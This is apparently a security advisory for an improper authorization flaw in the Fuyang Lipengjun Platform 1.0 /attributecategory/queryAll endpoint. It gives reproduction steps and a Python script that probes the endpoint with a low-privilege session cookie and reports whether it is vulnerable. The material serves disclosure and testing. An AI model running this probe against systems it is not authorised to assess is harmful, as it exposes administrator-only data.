Fuyang Lipengjun Platform Improper Authorization Vulnerability in AttributeCategoryController
Vulnerability
An improper authorization vulnerability has been identified in Fuyang Lipengjun Platform version 1.0. The issue resides in the AttributeCategoryController, specifically in its queryAll function. The handler only requires that the caller be logged in; it does not check whether the caller holds administrative rights, so any authenticated user, regardless of privilege level, can retrieve the complete list of attribute categories. That data is intended to be readable only by administrators. The vulnerability can be exploited remotely by any account holder, and a public proof-of-concept exploit is available.
Impact
Exploitation gives any authenticated low-privilege user read access to the complete attribute category list, information the application intends to expose only to administrators. The issue is an information disclosure; no modification of the data is described.
Reproduction
To reproduce this vulnerability, log into the application with any user account, including one with low privileges. Then, using that account's session, send a GET request to the '/attributecategory/queryAll' endpoint. The server responds with the full list of attribute category information, which should be available only to administrative users. To confirm that the flaw is an authorization failure rather than a missing authentication check, repeat the request without a session cookie and verify that it is rejected while the low-privilege request is not.
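The following script is an added example for running the check described above; it is not part of the original advisory or of the Fuyang Lipengjun Platform code base. Only the endpoint path comes from the advisory. The base URL, the session cookie value, and the JSON response shapes (a bare array, or a wrapper object with a list field and an integer `code`) are assumptions to be adjusted for the target under test.

```python
"""Probe /attributecategory/queryAll with a low-privilege session and classify the result.

Added example, not code from the advisory or the project. Assumptions:
- BASE_URL and the Cookie header value are placeholders supplied by the tester.
- The endpoint returns JSON, either a bare array of records or a wrapper object
  such as {"code": 0, "list": [...]}; a non-zero "code" is treated as a denial.
"""
import json
import urllib.request
from urllib.error import HTTPError, URLError

ENDPOINT = "/attributecategory/queryAll"  # path named in the advisory


def build_probe_request(base_url: str, session_cookie: str) -> urllib.request.Request:
    """Build the GET request a logged-in user would send.

    session_cookie is the raw Cookie header value of the account under test
    (e.g. "JSESSIONID=..."), captured from the browser after login (assumed).
    Pass an empty string to send the same request without a session.
    """
    url = base_url.rstrip("/") + ENDPOINT
    headers = {"Accept": "application/json"}
    if session_cookie:
        headers["Cookie"] = session_cookie
    return urllib.request.Request(url, method="GET", headers=headers)


def classify_response(status: int, body: str) -> str:
    """Classify a response to the probe.

    'vulnerable'   : HTTP 200 carrying a non-empty list of category records
    'restricted'   : HTTP 401/403, or a JSON wrapper whose "code" is non-zero
    'inconclusive' : anything else (non-JSON body, empty list, other status)
    """
    if status in (401, 403):
        return "restricted"
    if status != 200:
        return "inconclusive"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "inconclusive"

    records = None
    if isinstance(data, list):
        records = data
    elif isinstance(data, dict):
        code = data.get("code")
        if isinstance(code, int) and code != 0:
            return "restricted"  # application-level denial behind a 200 (assumed convention)
        records = next((v for v in data.values() if isinstance(v, list)), None)

    if not records:
        return "inconclusive"
    return "vulnerable"


def probe(base_url: str, session_cookie: str, timeout: float = 10.0) -> str:
    """Send the probe and classify the live response (network access required)."""
    req = build_probe_request(base_url, session_cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))
    except URLError:
        return "inconclusive"


if __name__ == "__main__":
    BASE_URL = "http://target.example"        # placeholder, assumed
    LOW_PRIV_COOKIE = "JSESSIONID=REPLACE_ME"  # placeholder, assumed
    # The flaw is an authorization failure only if the anonymous request is
    # rejected while the low-privilege session gets the full list.
    print("anonymous     :", probe(BASE_URL, ""))
    print("low-privilege :", probe(BASE_URL, LOW_PRIV_COOKIE))
```

Run the script against a test instance you are authorised to assess; the two printed lines should read "restricted" and "vulnerable" respectively on an affected 1.0 deployment, and both "restricted" once a role check is enforced on the handler.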
